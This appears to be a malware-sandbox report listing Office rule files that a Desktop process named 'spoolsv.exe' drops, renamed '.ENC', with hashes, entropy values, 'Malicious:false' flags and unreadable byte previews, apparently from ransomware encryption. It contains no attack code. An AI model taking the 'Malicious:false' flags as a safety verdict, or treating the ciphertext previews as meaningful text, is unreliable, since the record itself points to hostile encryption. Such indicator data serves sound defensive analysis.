                                                                                                                                                                                                                                                      Preview:..d...........q~....K. /.z^.I..Q.D_.=.LE...-.F..N.....%E...Yq.4m.u-.f........(H...-.0...PLm^....$.B...!.....X.*k...5..i.......:5.....E....F.....U....M..<...t.^.`.zS9..8W`."..`..p.!.J@...t..Z.....a.2.=.Op/.K.[./y.Z.....s.8.B.....@e.c..Q.....B?.e..ow.a.z[.....;.6N..u.h&d'.{t2..m1.......}.D.i...v&..b.....Jr+*.........T.J~}W.1C."2.......<......f..,...._._.$....?...W.D..].+....k.K.=..Wj.7]...GV..!.....T'.."..<_'..Ec5......T...D<..M....>$.)UQ...r8.\[.j...C.S....f.-.C(.e..s.x.K..Qs..H :..\|...$..k.).y...a.....S..`..YSp..ck.!x..$.e....)..'r.j.z.T......Q........m.O..1.i6%.V.L............:C.u.9j.?|..uUN..p..........^..!..#.^r".gT9d..U.R..\.!..I]..8.....?.|.d5....:............I.f.-.....}..*.....7..... ..3^9........]...ym\.........M.T.F..5..dk./Q|.._./.i&......<$.K~....5v.7.w..TI.q.,..g..g9..$.....#..85.:..?.O;....2......k.<.%UB.z.h..x.....K@...Kf..?.....uq..t........U[T.4< r..s2......U.........jO%+.qw...m...vf.@.]..)#...S1..b...i......s.p...U.

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule703300v0.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1392
                                                                                                                                                                                                                                                      Entropy (8bit):7.863239713307767
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:+Nh0c/yNeJAxmCB7IgB+PNrXklmHljghOHmCdEmHVmLDtpaZDGCzwLKUdBMVQ1:+4HEJAgCRIAEFjAOGC1HkOBPwLLqg
                                                                                                                                                                                                                                                      MD5:689B33A030E8E8B1E2C68C3B7D76FC5D
                                                                                                                                                                                                                                                      SHA1:4A1E4AAAA47CDC89C4A2AFC78550CDFE45FD3248
                                                                                                                                                                                                                                                      SHA-256:9A9B56E92F9D5A08EB251EE4F7F239CEF5E8D31BE92B42DD5CF41E1EAD5126FB
                                                                                                                                                                                                                                                      SHA-512:A1C53BB955F912ACBF0075E538830778AE2646066E25C307FE637CA51937D61674261CE3D1450F32DB316F284C03EC316C7A25F7E1B2673D5BDE1F0B56723284
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:..d...........q~....K. /.z^.I..Q.D_.=.LE...-.F.Q..j'.k?......w.h=.=k.v.3...i.s.<B...[O..|Xi.6.T..M.......E....-p@:...V.!.Od.{..S.P..!..[..8...h.K.fC..)N..u.Z..U..e3...B..>.i...h..uR.....Y....9.a.d..@.,....N.X.'f0.X...e..t.......c....'.b..zw.........+.|.~...n.I...J..c.v.|....o/.@.Q.I..wv.\....!.......,...w..s..|[.2...f.'..N-0.c...P.8/.R..`V.,...q....P.!.S"Q?O$....c.w..h...%].ae.J..h.(..R..r..'.@..Q_OXx.Y;...V..8X..~...%i.v5./vl.(.;..-.2_..0.3...zt.ts..Y%.g9n..:..I.yP...}0...g...l..6R..v.e.sL/....]..{G.).........7..0....w..N..YL...H.......0..7....6.v.......9.....es...[..^X.x.$..S%.....dl.......X...=4..#<Ht...qpw.y?..}C.>...z.^hF..C...G2.d..P....Q...w......t...}cX.....!.x....utk..3.."...6Q...&....w.....p... ..g.|....W..Z....0..B....E.Owr/hy.oJz..I..2.A.1.g..n..7...s...GM.o.....KV....I`HQ".....&-...'..Y..&7.L...B\.......E..8(..N...K.LlY..G...{..]./X...sDO4..8...l2..y.b9Rv.m.[.>.Nf..5..KN..V....C.i.(....i..(q.....">.z.^^......+.O..i.0vn..f=>

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule703301v0.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1424
                                                                                                                                                                                                                                                      Entropy (8bit):7.875158148909249
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:+UuDCgjWbe5XdbIGM4P7QLbUr6FgHn94pkAHwoqd8e3gazwvNaOHWtyEAsjgiDlW:+UuWiU+CP4PMHs0Qae3gazwvN9HWFA4c
                                                                                                                                                                                                                                                      MD5:9E8B1898523470877609C92D2A66ADAC
                                                                                                                                                                                                                                                      SHA1:87D6D4277BCF047E164D2CD59722B9F6054BD30B
                                                                                                                                                                                                                                                      SHA-256:35E421349FFE9172B175BB7A251BDD6D5510A4E81D9463D2B8CF422FAB02E5B7
                                                                                                                                                                                                                                                      SHA-512:4C3963183CEE2ABC188BE82E94236039BBAC408149B4E80F91D4AADCB9170ADA3FB69247E75018A255FA47C9A06C0AEEF33DC1E314ED79702E4A6C24B0538215
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:..d...........q~....K. /.z^.I..Q.D_.=.LE...-.F.Q. ...h.i.Q..b..<k."..!......W...X....og.....2...\.P.q...in...".t%.|.....J..Y/..... ]6v.@o..X.....m~t...*.a$p....c...A.K.(....`.(H...C'....0.=C...)[...&."..;ls...j.?Ki.FL..X.'R&.;...4..B.fOU!4....X.jm|.tt..2.y...G..........9../2.}.%....^u&...m.E....k2..MT...x.......c....Q.>u%i..s....WS...>.........h..-..5X.G...$W?zG-..X...r..A.=.LI..9..4..z`O...3.D.-......E...../.(..$.....\.P.^b.g>.3W.).Y<>.vhf.s`..j.....h^LX.a.&.....L..d.....'.c_U..<.......np.v.V j...QR....H...........K<..'..]...<.u....O.].%q..T.2v.]"......4...Y..>w6....>x..6.#~G...................-.SWU.~~.<v.~<f...|.aZ...C..f.6 ..+=p.~..#.d...m........p4*....+"e..$..A.gf....KV.d...x.(.X[8.P@X..X.:....1.8..`t..}..0.y/..[.,a..3..&...S...0.t.A....|..0..M..j.?9.... ....i.+.S_...I....Y.0-'.....l..o.o..L}..o.T..(a."[C.....F.Z..V%..S\.....R.nLd.r'...}.l..w..|......Jf.._jv.{.....k...6..N...d.c..Yw.._E.9...S.;.2.{.vcp.la....r... ....(..j..A....

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule703350v0.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1376
                                                                                                                                                                                                                                                      Entropy (8bit):7.88097048440929
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:+2n5wyJHhgwzhXXmGUG/SmTqxeMlq60tfARoN4Vh/+f5uheq1xIlLv6Lq4Su:+c+yfgMhX8VmQKNsJhemxIlLv6zr
                                                                                                                                                                                                                                                      MD5:26C002E8B44A3B24BC2890769F0016A3
                                                                                                                                                                                                                                                      SHA1:7BF7BE38CC7955C4065639995AA059789333D76B
                                                                                                                                                                                                                                                      SHA-256:C8B03CA59FD827FF246E866C046C2E698FC78D56F87F3C8A75B5837011CA208B
                                                                                                                                                                                                                                                      SHA-512:C61A7A9735643B5EA97680953BCE8DBB5FA111FDE648AB5E844277730B5CC326F06DED3235791D5F417980A73B25FC3D3EF7E30F40E467796F966F9EBF7A5BAE
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:..d...........q~....K. /.z^.I..Q.D_.=.LE...-.F..e.;I.p..U..9<mn0.U.d..Gk8.{....a.B......c......a .... ....:F..r^.T.........s..p[...i.l.*......FtKM..KrYf`6v4.;..B6.h..d(.y.Ez(..0(.loy9Zm.G.......|..r....z...5m!Z...u0!!.|7..Il5k...@......./..u..9c...~........'.(.0..x..A_.^xJ".X.o.....G.(_...5....;.k.&.'..+2s%3...k...V..R\..$8.H..q..p.g..*8..N..S.......`-...d5Q..W.<.:.j4u..].qo......tq.F.d........~..Q..JQ...X.Lx{.....K.M...i7L5.....$..p..N%.f..Hf.o........K..c..@..^q.=HX@....7*..r...+.=L..F.Q_...Y.P..y.0.^..z.mq.+.z...&...3...a..[.....x.Z6...+x..C....8...lD..KS<.......M%`Mt..%.L.%......uDg..+EJ.S%...P.......l.~.&`...oC.{..j.^.z[...V....nr.p...]...4>.....$S.|.~_.{D.C..g.@.,.......x..i...+*.."...w...SI..M<..T"b..m........8...!.D..@.X..9..L.....qC......Nd.D*j..S...Un.......W......v^,.o.._..0.d...)..._*....d.../..p..:.#y..=..)XR(o..7.....85I ....FO..3...?...#.7....8h.[..I.@...q.?..."...k....('0q......@...e.T..a0\U.et...P\.Rv..<p........M...Z......

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule703351v0.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1408
                                                                                                                                                                                                                                                      Entropy (8bit):7.859613547260776
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:+lIS18dTYZlldtVoTc3Ph9cSQIZL4g+BA5GC26w/Zt6AnjLNqymED3+98Dl4d5jT:+H12TYbldQg3/4RA5GfzPVEyhD39Dla
                                                                                                                                                                                                                                                      MD5:D76EA92E38098C20B73FC264A8391682
                                                                                                                                                                                                                                                      SHA1:906EC3DB737F1829D01DF6A17BEC40D90DDF3DEF
                                                                                                                                                                                                                                                      SHA-256:D428AABF6126FF7D32E62ADC2558D2136243E663961D57158E716AA099832531
                                                                                                                                                                                                                                                      SHA-512:429935E9B60FCD79BDD4AD518E2F4184BBAD99808BBF6C927B49C1306DEF9C70C0BB1BA20DBF383835D4102325E75F5259F31E0213B63C963213D24A8FF09F47
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:..d...........q~....K. /.z^.I..Q.D_.=.LE...-.F.[.l^..zR.L`w....#.....J.7..9Y2.9...Q.|-.M.e>.G..>.K+.>.......!4.....X-L!...,..O..-.M....f..{V..Am....l.V....."4J>y4....Eh.$...aH.V.=...1..H...............0G.K.xm..v1a{.....F1.@....2....@".K)p.....:..L.`'.w.1...#..M..?$...+^....C.*+ltg..3O..[.:...p.4.w7.I......XE.H..AOv.j.)(?....k.r...._.......WUR..D.!_..&rQ./.}..DDO5..../..N..v..7..\.+..d.Z.K..X.LD.g.BN.fx...K..u.[........kC:.$...K.h..s5.oO)6.......Z.lL....8......Z.@...P....}.&.....mF.D.c_..G.....HSXN/..ZT.~v..6..~.".6.*.....x........K... .3.(...F#.M.&p.|Q.....G..z<....N..0..j.xGN...p..m.x..u2^...!...~..X...C+...5......;l...[*Z}.pJ.z...L..z=..C..A....{y..4.....aW.O.a..~m.'.Z.f?.&.....2.8..=..3U...U1<.....T....|QG.1...Q.O:.gI..W...EA.o^.I.e...0. ...g{.)4..;.X..G.C.1...QX....n-..I..w......oLK@..m.p.*.5P.|..Z&6@vC.....<.9..y.j=....}...<......3..s.....e......xm&r/.!..L.51.V].#..v:...F...z............Q......D....i.m.#. ...'.W....`^v..;C.G..>L....m..

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule703400v0.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1392
                                                                                                                                                                                                                                                      Entropy (8bit):7.835568558306142
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:+3UO0VWB2Sa2UCtt9ljzzCRrwtzukq1UTkVOlsUyFXvE4KoZHUuOlDVqHVj:+kOp6Cttv3i1khTkVOls/FXvHp+V0Vj
                                                                                                                                                                                                                                                      MD5:A850DEFB0D345B7C2726A1EB67F87DF1
                                                                                                                                                                                                                                                      SHA1:1214F9495EFA57DB7383A9A4C5BC24F9FC9D0256
                                                                                                                                                                                                                                                      SHA-256:E8E3A91AB87D078291488D26247574EE537DF8FB7013611CF92065E70D2FF0BB
                                                                                                                                                                                                                                                      SHA-512:98D1B3536108D8063017F5BA4C01ACAEB43C8164EA2AB9DF7CB07046DA756B3AEEEE259B5D5521CAF8F4B3077E2815D215803DEBBAF0447ED6D7006A56675D59
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:..d...........q~....K. /.z^.I..Q.D_.=.LE...-.F.!.3..\FI.H.%..~..*.E.y(U...!`..#$..k.j...MR..C.z.+..GPfu..+.e{V.qP S...0......r.p.LC5AD.:4..>Q....G....pwa...`.M...".`WT....N.aV....|-D.G...UP.+"..I...\z......\a.>6.;..Kr^..t.h...G....x.....,...!K7sT0..&..a...#.......7\s.gI...kb.2!.[.5......._&K^....;....3.....A..pW...o>...o...W......JN.W..BaI.bh-.~.......d...RHK..[...4,.h.....1.>...5......Ix...L......>xm.B.0...l#....]9A..6.....u.Uc+.....1.l.E.@...........p.^.a....R...kd.;.~sW4q......~.^...^.0.2o.A..._. ...b.t...V.p|.S.Ja..?N.v.Q...!Td.<..+..>.:Z..m......Ofg+Ae1f.P.y.8-.o...........>-Ss.,...w<C...7)..'-".e@.~*........."<.I!I8M..+...~..tn%!..R...@..2.Z...UmiG..mF.....5..;.bh...&.. ......X..N.k.......mn.aQ...>v.L.'f.w......|...;..cZ.R...?k.<..r...xG....k.q...8M4Rb.u..b..&....Vlx...hY.dAI..q..y.1..Sf..S."8..*..^B.....@8"l.......9..po...2..@U..l3........f.w....x...;.9.>.)..X.bV...|..y*U..P4....D...0m..K.....y..I..........T....y.Y........#.:...o...G.:.6].V.6

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule703401v0.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1440
                                                                                                                                                                                                                                                      Entropy (8bit):7.873289550125403
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:+9OjE8dm/PICQcSy/Tpk2fteRsIppbgr+4NuthRz7SzWqqDgDu8Eu:+g5BCHrnI/ppbgrdNuDFDb8d
                                                                                                                                                                                                                                                      MD5:AA9FF2ED4FEEF733C68540B0710B57CF
                                                                                                                                                                                                                                                      SHA1:FEE32AD6727B785A0FD79ACD849B17C116E228B4
                                                                                                                                                                                                                                                      SHA-256:4726513092D1BD6354CEF4710442307C709EF6F83A6605CF3496C62E44FF3A1C
                                                                                                                                                                                                                                                      SHA-512:F5DB07E8C2AC17F40499D4AF66C87589C8252FDA77A2AD41CE960B4CE0E5A726E775E53720F6EA59BC4066F4DDF85F682C7EE94DA366509070BC2E0F0628332D
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:..d...........q~....K. /.z^.I..Q.D_.=.LE...-.F.S...ng..C..C..c.y.Qb{GS.0....R#lO|..X...Xr...p*.ap....B......s.j.2.,.....z...Qp`nW0...9...{v....RV.| M.Q.Y ....c....m.....u...f.n.o.;..D.1.>..t..+I.?....##W....u^...;.p..Z.-n.8..y.X....g. C.0_.{=CN..%..........>Y3V.M.P/._..A..=..W..N.%...]/..M.v.6....e@..^.2...o0Uw......0E.!.Jv........^"\w.Y.U.;. .q......L.k..+.7.gi...+.#.F..n..)..%.p........V.....?z39...x...........j.PZU........z.J...0..>'.+.w0]....;..n0...HM/.g.g.w...{/.u.~]h .....j...7....XZY..E........C...q.2n....t..?G....c|5...3..yw.>Q...... ?.n.uP.3..O...>mP(1"!.'b(d...R;..... R3..3.!..:.2.;..0..[j.A..cq.......Aa....j.{.|..[.".=.4..s{.........d6.....7..B...R.*]h6]K.&=.r....0..CZ..G.75......m...^..@^|/...r..".}f....#%.....T...i%.4.oT...:..0T.$..........Oe.^$.....?.z...*f..@4.A...........G.l..._F.U..~c.Gf]..,..l|u..$.....d..}..)F..OTg9....mBN...SJE..zt.58YZ.oJ.(=..w@}?!A....m..A.XlNkU!...:...du|....+p..[..I...8..q....=.ot.C.`.b.I.OcS..K..Q6.

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule703450v1.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1376
                                                                                                                                                                                                                                                      Entropy (8bit):7.882993263986372
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:+9DqDL6/T6aiRJALaYk4Gbs6wuk+ad7rkb2UrOaitrHqSbmD6xH50Q/aM+0:+9Wv6/Oj/NYk4GbnfncBUr7SbC6xH50+
                                                                                                                                                                                                                                                      MD5:C6C221BF21683950102A205A5FAC9DE8
                                                                                                                                                                                                                                                      SHA1:52F063F0F80F6BB4E267640663179C44CB02E273
                                                                                                                                                                                                                                                      SHA-256:4DA4B967600C2B0FF0D299D234D6C210955C7841C4675F2ACAAF072954D4E29D
                                                                                                                                                                                                                                                      SHA-512:F699AD4716618B30D897A64B1B863D493EE08B303EFB59CB2918A0A7C15B98F4C002CCA50972CD9AE23F01387CC4E546586E6557756C2AD40CF069E717F6508C
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:..d...........q~....K. /.z^.I..Q.D_.=.LE...-.F.i...^H....y........vRH.......1.Z.k..c.....].0`..oF4..[.K.I|/A.5.HD8..l..7...j)./..}..e{....[.+..?...........T..........> .}'.v...x..d.K...Q.%.}.V.1plG...u.....1u..].bLZm.f.n..h.4??P..)...eXw.o..w.=..z.....I..............C'.}....}M.%....DM..3.l.qej..6..Y2..}...F....sh.i......y.`..../.....V........v.m..V@..yU..4. T+A#.7.G...,..u.|.I.Q....I..O..l.j.&T...<W.....E.)..GP.C.t,...rh\..lwS.7...-.j=..-.=.z...L...A5N....L.Rq...0V..5..f..t...w..%M$lQM....._.f...A.c..?s...k7.......J.$K.....;KR...v.......#xF..(xs..K._..h.C..suL.e..)mx.....4:\....?....1.....a^F.K!.$+...+.A...C.dR..}.E`....!...p.W.......,..p.p.#^.iq.uD...!............UuL....(.....J.-uB...cww)@7._{...t...-.Op....Pgj..4(c.5v..~...7vo...}..#x...X./..!hH.8..w..#t..p...\L...8q....F...KcY...-.^.<...../)...Zo.j..O....?.....%l..[.....S>J...._...j..O0.~....0....!Z....K....."..V.W........-...,....*%o.D..8...=.:.wx....8..i.5MCf...H^..am[=8s.

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule703451v1.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1424
                                                                                                                                                                                                                                                      Entropy (8bit):7.854968526100876
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:+EBkFfUe1gzPxswRJlbwvsNOis+uFEcQbaeGQObKdOSf0bX/4dvm/xvPxKgm:+EB6fUqgOwiisj1QbaeGQOGtf2X/Cu/I
                                                                                                                                                                                                                                                      MD5:61539184B375098EACA2D91DEA1F5A27
                                                                                                                                                                                                                                                      SHA1:9C91045B46E43618DFCA3FB3E44211F239A2CCEC
                                                                                                                                                                                                                                                      SHA-256:66CA11E0E86B193E3434E20C520BCC28FFFC6D1F798AA1586A00B5A808D7E523
                                                                                                                                                                                                                                                      SHA-512:4D77DEB5394255A5E89128C8D5CC737D822569F3AFEE23D78DDE5E4A8F701101C70EA9A070CB26F03D229AEF31FA073460AF26EB031ED6F13E61CC6FA76CD7CB
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:..d...........q~....K. /.z^.I..Q.D_.=.LE...-.F.\..tc...3... g..d.l...v9[.R;..M...m..i.i.....E.$.)..b-M..Z.F..*....R~...bq....f...z.gh23.}.6..&.?.....q.y..'..R....5s..2*....5R.S..%%.G...#K.Y..L.0..b.:.A.>.w;.d.y.5.5N3O.-.Nl..c....;u.e.. 3.j...U.*69...F*2L..\L.J..O..EC...............]!...]lo..L.H.k...HS.....KND...{w...UW8y.Uh.b?~p.[^.q....._.-6...Q0...-/...e.....k3y.C..!7.ZAyX]..l.\..F....^+......1....b...Qy_.n7Z./.J.e.~...|...Z........{..o.z.4xV.t......Yc0.}m.........)kVP.<....D...Z.d...../.T.......q.{l..x?......h#V6.v..tB.dFh."......NH.8....;>&. LK....0..JQ..$!. ..xR...D-.....WV..e..rh...%$=y'.=]3...!.6......Ji.}....~i..C.. 4..M....#._.`.c..c............Y..c.G..p.............G.e.I..9...>.sxm.... ..[..B ,..98.E.N..k..|....^C.!lT..3..3......G.O..r....s..U.L4X...P.10*.....xH.....Zp..._.w^xd...|.2...E0fg.ig+....;......N.]j.y.w.~(.DGk>%............WL.F....s8......I.o......e.%rs.1n.)..t.H.........*k.....S..as`..B.y.Y...1]....J.l.JCp..&..b9..2Tx

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule703500v0.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1376
                                                                                                                                                                                                                                                      Entropy (8bit):7.858847899273158
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:+GdB9BSNUi5PpRa6jqpQyEu/92hYSrQJXFEp0V8v4vkpoiLKT51+k:+G1Baj5PpRa7SkJXOp88v4vkposk
                                                                                                                                                                                                                                                      MD5:61DC388E2C74F7063E28FA4BF0AFF6CB
                                                                                                                                                                                                                                                      SHA1:492A92D1C92602A7981E2849A346A7B845520AE9
                                                                                                                                                                                                                                                      SHA-256:3E15CBE44542EF4E06D1A6341EA0C4D308D033A6DD008A2CD5E05E335207E0C3
                                                                                                                                                                                                                                                      SHA-512:ACEF7747E4B78EA86AA01A0424BFF62B7B1F6A6F1156DD3B5DC3EA181F58CBE7D5CAA706F88B5AF82655B15C4FF53C87718E0DD6C09F6C38BDD21F9E9CB848DC
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:..d...........q~....K. /.z^.I..Q.D_.=.LE...-.F......P.4O...,)G..K..^r..[.O.J...j...L....q..N)...,.gg....WA...w&..M..Z....B.`..8.B..j....m...".)e.O.....~........,......Y.r..R3..!;.....0...WA.y...w.wGTX.=.]<....Q..-..xB..a.e......!].^..L.I.A..%B..c.....N...S.=..P.{.6...,.:.e....-....|%.Q...:..H.8....^....^..5...T...^S.....JR!DF...+>...9B....Ru.9.}..|.\.=~.;O....R.-O..B.H.\.o....O..;.....%.4./....C.{.mE.......}%..j.&..<,...,.2f./g.".{..'...q..j%....w.K<~.v..1d.....L.`g@.:.D...EK..?a.-.KX..<...M...i:.-.{.vt...YK.`.3k..W...yL#...r..zpoCZ..s5 u.m..f..........F....34..4.....n.H......R....a.#P8Sj.Y..?.+.i...............9...O... u...*.5..*.._S.._Q....h...^aC.#%..2^.O..Z......t...PN8...95......1..[...0.%. .Q.Xec...KS)../....U..A.<..<....E-....xbWJjk....w......]w. .cG<.01..Y....*LdP...A..4dGl..eH..:)..U...9.$.R.v....g..~.@[4.C.......J.#$=.{....F......gR..[O.........#.M.D....Y^..XG...[....S<E.f...%./..B.m...K..js...K.....X..\=..PM...C..TK.<....7.M3...."0

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule703501v0.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1408
                                                                                                                                                                                                                                                      Entropy (8bit):7.845813103644465
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:+K9CkqRL28WBoO+GjfWKNHasjWWOu15xkv4XG5QHTFV2TUSofx1RRi:+/g8chCzaOubxy5QHTvMU7fLi
                                                                                                                                                                                                                                                      MD5:4B506CBDC08CF691E6E80C14F1F4DBDF
                                                                                                                                                                                                                                                      SHA1:A52A09BADEAE1295C48BC638970590484B6C2368
                                                                                                                                                                                                                                                      SHA-256:9002B78A03EBCAFE7D8CBEA376D99A75500A82C69995EA7E56692D876A198DD2
                                                                                                                                                                                                                                                      SHA-512:4BB483A6FA404F756E2D2C2281EF7E5E9CA49BB23083C7746AA062EAEECBF1D4A8EC44F97F6FB56D06B9B90EE8148649E3F8808CBD741B7838B515AC948E353E
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:..d...........q~....K. /.z^.I..Q.D_.=.LE...-.F..D..}...eGY.....b.9.tU.<2.Mt.L(,..3%o&[........2y.=}M..'.U6..1l.=.....z.....1t....(,.Od.=...,.Q. WS`.._E..jYc..>0.A..e......+G!K.......*.....I...}"T..c...6Z.Gd..;..~.f..Z.A...#^.&D(M.r,...&.Y=.sk.~....~.qV...o..dn.k.OH.I....nzE,T.Ao..jUJ..nj..w-..T.M...a4I.W#.c.n....1.G...#......Bn..r...p_i.......+/....c"V..=..B......`?....P[.@."....Q....7....F......>.....\.>.g..ha.9...&..z^..4..>#N.......W{...*H.w.[S.LNx..UGS.q.^..ngK.....`.{:. ..>...5(<..~...'...2ln..)k.H.....)......l.....Tg...&...h.t..{.....*l.l...B.xQ.......?x.......h......^\54%1mX.:.DCm...;.".W...".N=.?.f]...Rh.}.9bg.7q._.?AR.T^......D...*...y...l...\.H..z..h.=_...[.T./.V..0..2....L....).l........c.wR.g.(..".Y.....*.A....z.....z_.....6I...[>.."...{.Q....5.K.)......%..6G..s.....U .........7.@R. ,.s..3V.z..6.1..50.b.../.b..,...T7H.~......*.W,..<4..2]".\...=..[Y.j..........X..Z.r.......D.-=.q.wd./j.Ox.9.1.U..&).....c...-sJ.".l,...&

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule703550v0.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1376
                                                                                                                                                                                                                                                      Entropy (8bit):7.84447592447428
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:+V9PZpo3TgbQYdNck6L15zBb7Prvq0m5fhpCelYj4JIAPSM7zy/I0jZ6UBAsmPRS:+VPpoaTchL1/7PrvrmFCefJ/Scu/j6Ub
                                                                                                                                                                                                                                                      MD5:2731E3210363E67358579E85365EAA06
                                                                                                                                                                                                                                                      SHA1:E829F4EA04A40A2F198BAD220FE96A3207D41E54
                                                                                                                                                                                                                                                      SHA-256:713C63EDEC3F3EA8D602E6D6AD8714BD3208FB7D6C99482DCD05FBF3788AA70A
                                                                                                                                                                                                                                                      SHA-512:F17EE89052DBF1BC5049549C11CCCAF309805DA2078F4E0494CEC2B88C95A79AB0DBB1ED380472E8FCA8026598DC0822B2031C4A79FE35E51DE863E50AC00291
                                                                                                                                                                                                                                                      Malicious:false
